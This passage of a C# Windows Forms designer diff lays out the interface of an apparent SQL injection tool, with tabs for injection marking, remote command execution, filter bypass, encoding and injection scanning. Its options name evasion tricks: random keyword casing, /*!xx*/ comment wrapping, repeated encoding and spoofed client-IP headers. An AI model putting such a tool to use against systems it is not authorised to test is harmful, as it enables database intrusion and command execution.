System.EventHandler(this.cbox_inject_type_SelectedIndexChanged); + // + // label27 + // + this.label27.AutoSize = true; + this.label27.Location = new System.Drawing.Point(15, 28); + this.label27.Name = "label27"; + this.label27.Size = new System.Drawing.Size(65, 12); + this.label27.TabIndex = 26; + this.label27.Text = "判断方式:"; + // + // inject_btn_autoFindKey + // + this.inject_btn_autoFindKey.Location = new System.Drawing.Point(17, 92); + this.inject_btn_autoFindKey.Name = "inject_btn_autoFindKey"; + this.inject_btn_autoFindKey.Size = new System.Drawing.Size(75, 23); + this.inject_btn_autoFindKey.TabIndex = 24; + this.inject_btn_autoFindKey.Text = "查找关键字"; + this.inject_btn_autoFindKey.UseVisualStyleBackColor = true; + this.inject_btn_autoFindKey.Click += new System.EventHandler(this.inject_btn_autoFindKey_Click); + // + // injectConfig_btn_checkKey + // + this.injectConfig_btn_checkKey.Location = new System.Drawing.Point(133, 92); + this.injectConfig_btn_checkKey.Name = "injectConfig_btn_checkKey"; + this.injectConfig_btn_checkKey.Size = new System.Drawing.Size(75, 23); + this.injectConfig_btn_checkKey.TabIndex = 23; + this.injectConfig_btn_checkKey.Text = "验证关键字是否设置正确"; + this.injectConfig_btn_checkKey.UseVisualStyleBackColor = true; + this.injectConfig_btn_checkKey.Click += new System.EventHandler(this.injectConfig_btn_checkKey_Click); + // + // txt_inject_key + // + this.txt_inject_key.Location = new System.Drawing.Point(115, 59); + this.txt_inject_key.MaxLength = 20; + this.txt_inject_key.Name = "txt_inject_key"; + this.txt_inject_key.Size = new System.Drawing.Size(93, 21); + this.txt_inject_key.TabIndex = 7; + this.txt_inject_key.Text = "个"; + this.txt_inject_key.TextChanged += new System.EventHandler(this.txt_inject_key_TextChanged); + // + // chk_inject_reverseKey + // + this.chk_inject_reverseKey.AutoSize = true; + this.chk_inject_reverseKey.Location = new System.Drawing.Point(17, 61); + this.chk_inject_reverseKey.Name = "chk_inject_reverseKey"; + 
this.chk_inject_reverseKey.Size = new System.Drawing.Size(84, 16); + this.chk_inject_reverseKey.TabIndex = 22; + this.chk_inject_reverseKey.Text = "反取判断值"; + this.chk_inject_reverseKey.UseVisualStyleBackColor = true; + this.chk_inject_reverseKey.CheckedChanged += new System.EventHandler(this.chk_inject_reverseKey_CheckedChanged); + // + // chk_openURLEncoding + // + this.chk_openURLEncoding.AutoSize = true; + this.chk_openURLEncoding.Checked = true; + this.chk_openURLEncoding.CheckState = System.Windows.Forms.CheckState.Checked; + this.chk_openURLEncoding.Location = new System.Drawing.Point(17, 22); + this.chk_openURLEncoding.Name = "chk_openURLEncoding"; + this.chk_openURLEncoding.Size = new System.Drawing.Size(90, 16); + this.chk_openURLEncoding.TabIndex = 21; + this.chk_openURLEncoding.Text = "开启URL编码"; + this.chk_openURLEncoding.UseVisualStyleBackColor = true; + this.chk_openURLEncoding.CheckedChanged += new System.EventHandler(this.chk_openURLEncoding_CheckedChanged); + // + // btn_inject_setEncodingRange + // + this.btn_inject_setEncodingRange.Location = new System.Drawing.Point(131, 51); + this.btn_inject_setEncodingRange.Name = "btn_inject_setEncodingRange"; + this.btn_inject_setEncodingRange.Size = new System.Drawing.Size(75, 23); + this.btn_inject_setEncodingRange.TabIndex = 19; + this.btn_inject_setEncodingRange.Text = "编码标记"; + this.btn_inject_setEncodingRange.UseVisualStyleBackColor = true; + this.btn_inject_setEncodingRange.Click += new System.EventHandler(this.btn_inject_setEncodingRange_Click); + // + // label13 + // + this.label13.AutoSize = true; + this.label13.Location = new System.Drawing.Point(10, 227); + this.label13.Name = "label13"; + this.label13.Size = new System.Drawing.Size(0, 12); + this.label13.TabIndex = 18; + // + // label12 + // + this.label12.AutoSize = true; + this.label12.Location = new System.Drawing.Point(9, 127); + this.label12.Name = "label12"; + this.label12.Size = new System.Drawing.Size(0, 12); + this.label12.TabIndex = 
17; + // + // btn_inject_clearRequest + // + this.btn_inject_clearRequest.Location = new System.Drawing.Point(131, 89); + this.btn_inject_clearRequest.Name = "btn_inject_clearRequest"; + this.btn_inject_clearRequest.Size = new System.Drawing.Size(75, 23); + this.btn_inject_clearRequest.TabIndex = 10; + this.btn_inject_clearRequest.Text = "获取数据"; + this.btn_inject_clearRequest.UseVisualStyleBackColor = true; + this.btn_inject_clearRequest.Click += new System.EventHandler(this.btn_inject_clearRequest_Click); + // + // btn_inject_sendData + // + this.btn_inject_sendData.Location = new System.Drawing.Point(17, 89); + this.btn_inject_sendData.Name = "btn_inject_sendData"; + this.btn_inject_sendData.Size = new System.Drawing.Size(75, 23); + this.btn_inject_sendData.TabIndex = 14; + this.btn_inject_sendData.Text = "发送数据"; + this.btn_inject_sendData.UseVisualStyleBackColor = true; + this.btn_inject_sendData.Click += new System.EventHandler(this.btn_inject_sendData_Click); + // + // chk_inject_foward_302 + // + this.chk_inject_foward_302.AutoSize = true; + this.chk_inject_foward_302.Location = new System.Drawing.Point(133, 22); + this.chk_inject_foward_302.Name = "chk_inject_foward_302"; + this.chk_inject_foward_302.Size = new System.Drawing.Size(66, 16); + this.chk_inject_foward_302.TabIndex = 16; + this.chk_inject_foward_302.Text = "302跟踪"; + this.chk_inject_foward_302.UseVisualStyleBackColor = true; + this.chk_inject_foward_302.CheckedChanged += new System.EventHandler(this.chk_inject_foward_302_CheckedChanged); + // + // btn_inject_setInject + // + this.btn_inject_setInject.Location = new System.Drawing.Point(17, 51); + this.btn_inject_setInject.Name = "btn_inject_setInject"; + this.btn_inject_setInject.Size = new System.Drawing.Size(75, 23); + this.btn_inject_setInject.TabIndex = 13; + this.btn_inject_setInject.Text = "注入标记"; + this.btn_inject_setInject.UseVisualStyleBackColor = true; + this.btn_inject_setInject.Click += new 
System.EventHandler(this.btn_inject_setInject_Click); + // + // mytab + // + this.mytab.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.mytab.Controls.Add(this.tab_injectCenter); + this.mytab.Controls.Add(this.tab_dataCenter); + this.mytab.Controls.Add(this.tab_file); + this.mytab.Controls.Add(this.tab_cmd); + this.mytab.Controls.Add(this.tab_bypass); + this.mytab.Controls.Add(this.tab_encoding); + this.mytab.Controls.Add(this.tab_scanInjection); + this.mytab.Controls.Add(this.tab_logCenter); + this.mytab.ImageList = this.myicon_list; + this.mytab.Location = new System.Drawing.Point(12, 112); + this.mytab.Name = "mytab"; + this.mytab.SelectedIndex = 0; + this.mytab.Size = new System.Drawing.Size(810, 451); + this.mytab.TabIndex = 1; + // + // tab_cmd + // + this.tab_cmd.Controls.Add(this.cmd_txt_result); + this.tab_cmd.Controls.Add(this.groupBox8); + this.tab_cmd.ImageKey = "cmd.png"; + this.tab_cmd.Location = new System.Drawing.Point(4, 23); + this.tab_cmd.Name = "tab_cmd"; + this.tab_cmd.Size = new System.Drawing.Size(802, 424); + this.tab_cmd.TabIndex = 6; + this.tab_cmd.Text = "命令执行"; + this.tab_cmd.UseVisualStyleBackColor = true; + // + // cmd_txt_result + // + this.cmd_txt_result.Dock = System.Windows.Forms.DockStyle.Fill; + this.cmd_txt_result.Location = new System.Drawing.Point(0, 76); + this.cmd_txt_result.MaxLength = 3276700; + this.cmd_txt_result.Multiline = true; + this.cmd_txt_result.Name = "cmd_txt_result"; + this.cmd_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical; + this.cmd_txt_result.Size = new System.Drawing.Size(802, 348); + this.cmd_txt_result.TabIndex = 2; + this.cmd_txt_result.TextChanged += new System.EventHandler(this.cmd_txt_result_TextChanged); + this.cmd_txt_result.KeyDown += new 
System.Windows.Forms.KeyEventHandler(this.cmd_txt_result_KeyDown); + // + // groupBox8 + // + this.groupBox8.Controls.Add(this.cmd_chk_showCmdResult); + this.groupBox8.Controls.Add(this.cmd_btn_start); + this.groupBox8.Controls.Add(this.cmd_txt_cmd); + this.groupBox8.Controls.Add(this.label15); + this.groupBox8.Dock = System.Windows.Forms.DockStyle.Top; + this.groupBox8.Location = new System.Drawing.Point(0, 0); + this.groupBox8.Name = "groupBox8"; + this.groupBox8.Size = new System.Drawing.Size(802, 76); + this.groupBox8.TabIndex = 1; + this.groupBox8.TabStop = false; + this.groupBox8.Text = "命令执行"; + // + // cmd_chk_showCmdResult + // + this.cmd_chk_showCmdResult.AutoSize = true; + this.cmd_chk_showCmdResult.Checked = true; + this.cmd_chk_showCmdResult.CheckState = System.Windows.Forms.CheckState.Checked; + this.cmd_chk_showCmdResult.Location = new System.Drawing.Point(418, 32); + this.cmd_chk_showCmdResult.Name = "cmd_chk_showCmdResult"; + this.cmd_chk_showCmdResult.Size = new System.Drawing.Size(72, 16); + this.cmd_chk_showCmdResult.TabIndex = 13; + this.cmd_chk_showCmdResult.Text = "回显结果"; + this.cmd_chk_showCmdResult.UseVisualStyleBackColor = true; + this.cmd_chk_showCmdResult.CheckedChanged += new System.EventHandler(this.cmd_chk_showCmdResult_CheckedChanged); + // + // cmd_btn_start + // + this.cmd_btn_start.Location = new System.Drawing.Point(496, 28); + this.cmd_btn_start.Name = "cmd_btn_start"; + this.cmd_btn_start.Size = new System.Drawing.Size(75, 23); + this.cmd_btn_start.TabIndex = 12; + this.cmd_btn_start.Text = "执行"; + this.cmd_btn_start.UseVisualStyleBackColor = true; + this.cmd_btn_start.Click += new System.EventHandler(this.cmd_btn_start_Click); + // + // cmd_txt_cmd + // + this.cmd_txt_cmd.Location = new System.Drawing.Point(82, 29); + this.cmd_txt_cmd.MaxLength = 8000; + this.cmd_txt_cmd.Name = "cmd_txt_cmd"; + this.cmd_txt_cmd.Size = new System.Drawing.Size(316, 21); + this.cmd_txt_cmd.TabIndex = 1; + // + // label15 + // + 
this.label15.AutoSize = true; + this.label15.Location = new System.Drawing.Point(29, 32); + this.label15.Name = "label15"; + this.label15.Size = new System.Drawing.Size(47, 12); + this.label15.TabIndex = 0; + this.label15.Text = "命 令:"; + // + // tab_bypass + // + this.tab_bypass.Controls.Add(this.groupBox9); + this.tab_bypass.ImageKey = "codeChange.png"; + this.tab_bypass.Location = new System.Drawing.Point(4, 23); + this.tab_bypass.Name = "tab_bypass"; + this.tab_bypass.Size = new System.Drawing.Size(802, 424); + this.tab_bypass.TabIndex = 7; + this.tab_bypass.Text = "注入绕过"; + this.tab_bypass.UseVisualStyleBackColor = true; + // + // groupBox9 + // + this.groupBox9.Controls.Add(this.cbox_bypass_urlencode_count); + this.groupBox9.Controls.Add(this.cbox_base64Count); + this.groupBox9.Controls.Add(this.bypass_btn_saveTemplate); + this.groupBox9.Controls.Add(this.bypass_cbox_loadTemplate); + this.groupBox9.Controls.Add(this.label28); + this.groupBox9.Controls.Add(this.chk_reaplaceBeforURLEncode); + this.groupBox9.Controls.Add(this.cob_keyRepalce); + this.groupBox9.Controls.Add(this.label10); + this.groupBox9.Controls.Add(this.bypass_chk_base64); + this.groupBox9.Controls.Add(this.bypass_cbox_randIPToHeader); + this.groupBox9.Controls.Add(this.label18); + this.groupBox9.Controls.Add(this.label17); + this.groupBox9.Controls.Add(this.bypass_cbox_sendHTTPSleepTime); + this.groupBox9.Controls.Add(this.bypass_chk_inculdeStr); + this.groupBox9.Controls.Add(this.label16); + this.groupBox9.Controls.Add(this.bypass_txt_replaceTo); + this.groupBox9.Controls.Add(this.bypass_txt_replace); + this.groupBox9.Controls.Add(this.bypass_lvw_replaceString); + this.groupBox9.Controls.Add(this.bypass_btn_addReplaceStr); + this.groupBox9.Controls.Add(this.label19); + this.groupBox9.Dock = System.Windows.Forms.DockStyle.Fill; + this.groupBox9.Location = new System.Drawing.Point(0, 0); + this.groupBox9.Name = "groupBox9"; + this.groupBox9.Size = new System.Drawing.Size(802, 424); + 
this.groupBox9.TabIndex = 1; + this.groupBox9.TabStop = false; + this.groupBox9.Text = "字符替换进行注入绕过"; + // + // cbox_base64Count + // + this.cbox_base64Count.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.cbox_base64Count.FormattingEnabled = true; + this.cbox_base64Count.Items.AddRange(new object[] { + "一次", + "二次", + "三次"}); + this.cbox_base64Count.Location = new System.Drawing.Point(703, 24); + this.cbox_base64Count.Name = "cbox_base64Count"; + this.cbox_base64Count.Size = new System.Drawing.Size(75, 20); + this.cbox_base64Count.TabIndex = 22; + this.cbox_base64Count.TextChanged += new System.EventHandler(this.cbox_base64Count_TextChanged); + // + // bypass_btn_saveTemplate + // + this.bypass_btn_saveTemplate.Location = new System.Drawing.Point(421, 190); + this.bypass_btn_saveTemplate.Name = "bypass_btn_saveTemplate"; + this.bypass_btn_saveTemplate.Size = new System.Drawing.Size(150, 23); + this.bypass_btn_saveTemplate.TabIndex = 21; + this.bypass_btn_saveTemplate.Text = "保存当前绕过配置成模板"; + this.bypass_btn_saveTemplate.UseVisualStyleBackColor = true; + this.bypass_btn_saveTemplate.Click += new System.EventHandler(this.bypass_btn_saveTemplate_Click); + // + // bypass_cbox_loadTemplate + // + this.bypass_cbox_loadTemplate.FormattingEnabled = true; + this.bypass_cbox_loadTemplate.Items.AddRange(new object[] { + "我要自己选择"}); + this.bypass_cbox_loadTemplate.Location = new System.Drawing.Point(541, 151); + this.bypass_cbox_loadTemplate.Name = "bypass_cbox_loadTemplate"; + this.bypass_cbox_loadTemplate.Size = new System.Drawing.Size(237, 20); + this.bypass_cbox_loadTemplate.TabIndex = 20; + this.bypass_cbox_loadTemplate.TextChanged += new System.EventHandler(this.bypass_cbox_loadTemplate_TextChanged); + // + // label28 + // + this.label28.AutoSize = true; + this.label28.Location = new System.Drawing.Point(422, 154); + this.label28.Name = "label28"; + this.label28.Size = new System.Drawing.Size(113, 12); + this.label28.TabIndex = 19; + 
this.label28.Text = "加载注入绕过模板:"; + // + // chk_reaplaceBeforURLEncode + // + this.chk_reaplaceBeforURLEncode.AutoSize = true; + this.chk_reaplaceBeforURLEncode.Location = new System.Drawing.Point(20, 26); + this.chk_reaplaceBeforURLEncode.Name = "chk_reaplaceBeforURLEncode"; + this.chk_reaplaceBeforURLEncode.Size = new System.Drawing.Size(294, 16); + this.chk_reaplaceBeforURLEncode.TabIndex = 18; + this.chk_reaplaceBeforURLEncode.Text = "URL编码前处理绕过字符(不选则在编码后处理字符)"; + this.chk_reaplaceBeforURLEncode.UseVisualStyleBackColor = true; + this.chk_reaplaceBeforURLEncode.CheckedChanged += new System.EventHandler(this.chk_reaplaceBeforURLEncode_CheckedChanged); + // + // cob_keyRepalce + // + this.cob_keyRepalce.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.cob_keyRepalce.FormattingEnabled = true; + this.cob_keyRepalce.Items.AddRange(new object[] { + "不处理", + "随机大小写", + "关键字大写", + "关键字小写"}); + this.cob_keyRepalce.Location = new System.Drawing.Point(658, 64); + this.cob_keyRepalce.Name = "cob_keyRepalce"; + this.cob_keyRepalce.Size = new System.Drawing.Size(120, 20); + this.cob_keyRepalce.TabIndex = 17; + this.cob_keyRepalce.SelectedIndexChanged += new System.EventHandler(this.cob_keyRepalce_SelectedIndexChanged); + // + // label10 + // + this.label10.AutoSize = true; + this.label10.Location = new System.Drawing.Point(587, 67); + this.label10.Name = "label10"; + this.label10.Size = new System.Drawing.Size(65, 12); + this.label10.TabIndex = 16; + this.label10.Text = "关 键 字:"; + // + // bypass_chk_base64 + // + this.bypass_chk_base64.AutoSize = true; + this.bypass_chk_base64.Location = new System.Drawing.Point(589, 27); + this.bypass_chk_base64.Name = "bypass_chk_base64"; + this.bypass_chk_base64.Size = new System.Drawing.Size(108, 16); + this.bypass_chk_base64.TabIndex = 15; + this.bypass_chk_base64.Text = "base64编码处理"; + this.bypass_chk_base64.UseVisualStyleBackColor = true; + this.bypass_chk_base64.CheckedChanged += new 
System.EventHandler(this.bypass_chk_base64_CheckedChanged); + // + // bypass_cbox_randIPToHeader + // + this.bypass_cbox_randIPToHeader.FormattingEnabled = true; + this.bypass_cbox_randIPToHeader.Items.AddRange(new object[] { + "", + "X-Forwarded-For", + "Remote-Addr", + "Client_Ip"}); + this.bypass_cbox_randIPToHeader.Location = new System.Drawing.Point(489, 108); + this.bypass_cbox_randIPToHeader.Name = "bypass_cbox_randIPToHeader"; + this.bypass_cbox_randIPToHeader.Size = new System.Drawing.Size(289, 20); + this.bypass_cbox_randIPToHeader.TabIndex = 14; + this.bypass_cbox_randIPToHeader.TextChanged += new System.EventHandler(this.bypass_cbox_randIPToHeader_TextChanged); + // + // label18 + // + this.label18.AutoSize = true; + this.label18.Location = new System.Drawing.Point(422, 111); + this.label18.Name = "label18"; + this.label18.Size = new System.Drawing.Size(65, 12); + this.label18.TabIndex = 13; + this.label18.Text = "IP随机头:"; + // + // label17 + // + this.label17.AutoSize = true; + this.label17.Location = new System.Drawing.Point(422, 66); + this.label17.Name = "label17"; + this.label17.Size = new System.Drawing.Size(65, 12); + this.label17.TabIndex = 12; + this.label17.Text = "发包延时:"; + // + // bypass_cbox_sendHTTPSleepTime + // + this.bypass_cbox_sendHTTPSleepTime.FormattingEnabled = true; + this.bypass_cbox_sendHTTPSleepTime.Items.AddRange(new object[] { + "0", + "100", + "200", + "300", + "400", + "500", + "600", + "700", + "800", + "900", + "1000", + "2000", + "3000", + "4000", + "5000", + "6000", + "7000", + "8000", + "9000", + "10000"}); + this.bypass_cbox_sendHTTPSleepTime.Location = new System.Drawing.Point(492, 63); + this.bypass_cbox_sendHTTPSleepTime.Name = "bypass_cbox_sendHTTPSleepTime"; + this.bypass_cbox_sendHTTPSleepTime.Size = new System.Drawing.Size(56, 20); + this.bypass_cbox_sendHTTPSleepTime.TabIndex = 11; + this.bypass_cbox_sendHTTPSleepTime.TextChanged += new System.EventHandler(this.bypass_cbox_sendHTTPSleepTime_TextChanged); + // 
+ // bypass_chk_inculdeStr + // + this.bypass_chk_inculdeStr.AutoSize = true; + this.bypass_chk_inculdeStr.Location = new System.Drawing.Point(421, 27); + this.bypass_chk_inculdeStr.Name = "bypass_chk_inculdeStr"; + this.bypass_chk_inculdeStr.Size = new System.Drawing.Size(126, 16); + this.bypass_chk_inculdeStr.TabIndex = 3; + this.bypass_chk_inculdeStr.Text = "/*!xx*/包含关键字"; + this.bypass_chk_inculdeStr.UseVisualStyleBackColor = true; + this.bypass_chk_inculdeStr.CheckedChanged += new System.EventHandler(this.bypass_chk_inculdeStr_CheckedChanged); + // + // label16 + // + this.label16.AutoSize = true; + this.label16.Location = new System.Drawing.Point(188, 60); + this.label16.Name = "label16"; + this.label16.Size = new System.Drawing.Size(41, 12); + this.label16.TabIndex = 10; + this.label16.Text = "替换成"; + // + // bypass_txt_replaceTo + // + this.bypass_txt_replaceTo.Location = new System.Drawing.Point(235, 57); + this.bypass_txt_replaceTo.MaxLength = 100; + this.bypass_txt_replaceTo.Name = "bypass_txt_replaceTo"; + this.bypass_txt_replaceTo.Size = new System.Drawing.Size(78, 21); + this.bypass_txt_replaceTo.TabIndex = 9; + // + // bypass_txt_replace + // + this.bypass_txt_replace.AcceptsReturn = true; + this.bypass_txt_replace.Location = new System.Drawing.Point(65, 57); + this.bypass_txt_replace.MaxLength = 100; + this.bypass_txt_replace.Name = "bypass_txt_replace"; + this.bypass_txt_replace.Size = new System.Drawing.Size(78, 21); + this.bypass_txt_replace.TabIndex = 8; + // + // bypass_lvw_replaceString + // + this.bypass_lvw_replaceString.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left))); + this.bypass_lvw_replaceString.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { + this.col_replace, + this.col_replaceTo}); + this.bypass_lvw_replaceString.ContextMenuStrip = this.bypass_lvw_replaceString_cms; + 
this.bypass_lvw_replaceString.FullRowSelect = true; + this.bypass_lvw_replaceString.Location = new System.Drawing.Point(20, 95); + this.bypass_lvw_replaceString.Name = "bypass_lvw_replaceString"; + this.bypass_lvw_replaceString.Size = new System.Drawing.Size(387, 317); + this.bypass_lvw_replaceString.TabIndex = 7; + this.bypass_lvw_replaceString.UseCompatibleStateImageBehavior = false; + this.bypass_lvw_replaceString.View = System.Windows.Forms.View.Details; + // + // col_replace + // + this.col_replace.Text = "替换字符"; + this.col_replace.Width = 187; + // + // col_replaceTo + // + this.col_replaceTo.Text = "目标字符"; + this.col_replaceTo.Width = 179; + // + // bypass_lvw_replaceString_cms + // + this.bypass_lvw_replaceString_cms.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.bypass_delselect}); + this.bypass_lvw_replaceString_cms.Name = "data_cms_getVariable"; + this.bypass_lvw_replaceString_cms.Size = new System.Drawing.Size(125, 26); + // + // bypass_delselect + // + this.bypass_delselect.Name = "bypass_delselect"; + this.bypass_delselect.Size = new System.Drawing.Size(124, 22); + this.bypass_delselect.Text = "删除选中"; + this.bypass_delselect.Click += new System.EventHandler(this.bypass_delselect_Click); + // + // bypass_btn_addReplaceStr + // + this.bypass_btn_addReplaceStr.Location = new System.Drawing.Point(329, 56); + this.bypass_btn_addReplaceStr.Name = "bypass_btn_addReplaceStr"; + this.bypass_btn_addReplaceStr.Size = new System.Drawing.Size(78, 23); + this.bypass_btn_addReplaceStr.TabIndex = 6; + this.bypass_btn_addReplaceStr.Text = "添加"; + this.bypass_btn_addReplaceStr.UseVisualStyleBackColor = true; + this.bypass_btn_addReplaceStr.Click += new System.EventHandler(this.bypass_btn_addReplaceStr_Click); + // + // label19 + // + this.label19.AutoSize = true; + this.label19.Location = new System.Drawing.Point(18, 60); + this.label19.Name = "label19"; + this.label19.Size = new System.Drawing.Size(41, 12); + this.label19.TabIndex = 5; + 
this.label19.Text = "将字符"; + // + // tab_encoding + // + this.tab_encoding.Controls.Add(this.groupBox13); + this.tab_encoding.Controls.Add(this.groupBox11); + this.tab_encoding.Controls.Add(this.groupBox10); + this.tab_encoding.ImageKey = "convert.png"; + this.tab_encoding.Location = new System.Drawing.Point(4, 23); + this.tab_encoding.Name = "tab_encoding"; + this.tab_encoding.Size = new System.Drawing.Size(802, 424); + this.tab_encoding.TabIndex = 5; + this.tab_encoding.Text = "编码转换"; + this.tab_encoding.UseVisualStyleBackColor = true; + // + // groupBox13 + // + this.groupBox13.Controls.Add(this.label21); + this.groupBox13.Controls.Add(this.label23); + this.groupBox13.Controls.Add(this.encode_cbox_encode); + this.groupBox13.Controls.Add(this.encode_cbox_decode); + this.groupBox13.Dock = System.Windows.Forms.DockStyle.Bottom; + this.groupBox13.Location = new System.Drawing.Point(0, 361); + this.groupBox13.Name = "groupBox13"; + this.groupBox13.Size = new System.Drawing.Size(802, 63); + this.groupBox13.TabIndex = 8; + this.groupBox13.TabStop = false; + this.groupBox13.Text = "操作:"; + // + // label21 + // + this.label21.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left))); + this.label21.AutoSize = true; + this.label21.Location = new System.Drawing.Point(32, 29); + this.label21.Name = "label21"; + this.label21.Size = new System.Drawing.Size(65, 12); + this.label21.TabIndex = 8; + this.label21.Text = "编码方式:"; + // + // label23 + // + this.label23.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left))); + this.label23.AutoSize = true; + this.label23.Location = new System.Drawing.Point(363, 29); + this.label23.Name = "label23"; + this.label23.Size = new System.Drawing.Size(65, 12); + this.label23.TabIndex = 9; + this.label23.Text 
= "解码方式:"; + // + // encode_cbox_encode + // + this.encode_cbox_encode.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left))); + this.encode_cbox_encode.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.encode_cbox_encode.FormattingEnabled = true; + this.encode_cbox_encode.Items.AddRange(new object[] { + "选择编码格式", + "URLEncode", + "Base64Encode", + "字符转Unicode", + "字符转16进制(UTF-8编码)", + "MD5加密"}); + this.encode_cbox_encode.Location = new System.Drawing.Point(103, 25); + this.encode_cbox_encode.Name = "encode_cbox_encode"; + this.encode_cbox_encode.Size = new System.Drawing.Size(200, 20); + this.encode_cbox_encode.TabIndex = 4; + this.encode_cbox_encode.SelectedIndexChanged += new System.EventHandler(this.encode_cbox_encode_SelectedIndexChanged); + // + // encode_cbox_decode + // + this.encode_cbox_decode.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left))); + this.encode_cbox_decode.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.encode_cbox_decode.FormattingEnabled = true; + this.encode_cbox_decode.Items.AddRange(new object[] { + "选择解码格式", + "URLDecode", + "Base64Decode", + "Unicode转字符", + "16进制(UTF-8编码)转字符串", + "MD5解密"}); + this.encode_cbox_decode.Location = new System.Drawing.Point(434, 25); + this.encode_cbox_decode.Name = "encode_cbox_decode"; + this.encode_cbox_decode.Size = new System.Drawing.Size(200, 20); + this.encode_cbox_decode.TabIndex = 5; + this.encode_cbox_decode.SelectedIndexChanged += new System.EventHandler(this.encode_cbox_decode_SelectedIndexChanged); + // + // groupBox11 + // + this.groupBox11.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | 
System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.groupBox11.Controls.Add(this.encode_txt_result); + this.groupBox11.Location = new System.Drawing.Point(0, 99); + this.groupBox11.Name = "groupBox11"; + this.groupBox11.Size = new System.Drawing.Size(799, 256); + this.groupBox11.TabIndex = 7; + this.groupBox11.TabStop = false; + this.groupBox11.Text = "结果:"; + // + // encode_txt_result + // + this.encode_txt_result.Dock = System.Windows.Forms.DockStyle.Fill; + this.encode_txt_result.Location = new System.Drawing.Point(3, 17); + this.encode_txt_result.MaxLength = 3276700; + this.encode_txt_result.Multiline = true; + this.encode_txt_result.Name = "encode_txt_result"; + this.encode_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical; + this.encode_txt_result.Size = new System.Drawing.Size(793, 236); + this.encode_txt_result.TabIndex = 2; + this.encode_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.encode_txt_result_KeyDown); + // + // groupBox10 + // + this.groupBox10.Controls.Add(this.encode_txt_input); + this.groupBox10.Dock = System.Windows.Forms.DockStyle.Top; + this.groupBox10.Location = new System.Drawing.Point(0, 0); + this.groupBox10.Name = "groupBox10"; + this.groupBox10.Size = new System.Drawing.Size(802, 97); + this.groupBox10.TabIndex = 6; + this.groupBox10.TabStop = false; + this.groupBox10.Text = "输入:"; + // + // encode_txt_input + // + this.encode_txt_input.Dock = System.Windows.Forms.DockStyle.Fill; + this.encode_txt_input.Location = new System.Drawing.Point(3, 17); + this.encode_txt_input.MaxLength = 3276700; + this.encode_txt_input.Multiline = true; + this.encode_txt_input.Name = "encode_txt_input"; + this.encode_txt_input.ScrollBars = System.Windows.Forms.ScrollBars.Vertical; + this.encode_txt_input.Size = new System.Drawing.Size(796, 77); + this.encode_txt_input.TabIndex = 1; + this.encode_txt_input.TextChanged += new 
System.EventHandler(this.encode_txt_encode_TextChanged); + this.encode_txt_input.KeyDown += new System.Windows.Forms.KeyEventHandler(this.encode_txt_input_KeyDown); + // + // tab_scanInjection + // + this.tab_scanInjection.Controls.Add(this.groupBox14); + this.tab_scanInjection.Controls.Add(this.groupBox12); + this.tab_scanInjection.ImageKey = "scan.png"; + this.tab_scanInjection.Location = new System.Drawing.Point(4, 23); + this.tab_scanInjection.Name = "tab_scanInjection"; + this.tab_scanInjection.Size = new System.Drawing.Size(802, 424); + this.tab_scanInjection.TabIndex = 8; + this.tab_scanInjection.Text = "注入扫描"; + this.tab_scanInjection.UseVisualStyleBackColor = true; + // + // groupBox14 + // + this.groupBox14.Controls.Add(this.splitContainer2); + this.groupBox14.Dock = System.Windows.Forms.DockStyle.Fill; + this.groupBox14.Location = new System.Drawing.Point(0, 95); + this.groupBox14.Name = "groupBox14"; + this.groupBox14.Size = new System.Drawing.Size(802, 329); + this.groupBox14.TabIndex = 21; + this.groupBox14.TabStop = false; + // + // splitContainer2 + // + this.splitContainer2.Dock = System.Windows.Forms.DockStyle.Fill; + this.splitContainer2.Location = new System.Drawing.Point(3, 17); + this.splitContainer2.Name = "splitContainer2"; + // + // splitContainer2.Panel1 + // + this.splitContainer2.Panel1.Controls.Add(this.scanInject_lsb_links); + // + // splitContainer2.Panel2 + // + this.splitContainer2.Panel2.Controls.Add(this.scanInjection_lvw_result); + this.splitContainer2.Size = new System.Drawing.Size(796, 309); + this.splitContainer2.SplitterDistance = 237; + this.splitContainer2.TabIndex = 18; + // + // scanInject_lsb_links + // + this.scanInject_lsb_links.ContextMenuStrip = this.scanInjectionURL_cms; + this.scanInject_lsb_links.Dock = System.Windows.Forms.DockStyle.Fill; + this.scanInject_lsb_links.FormattingEnabled = true; + this.scanInject_lsb_links.ItemHeight = 12; + this.scanInject_lsb_links.Location = new System.Drawing.Point(0, 0); + 
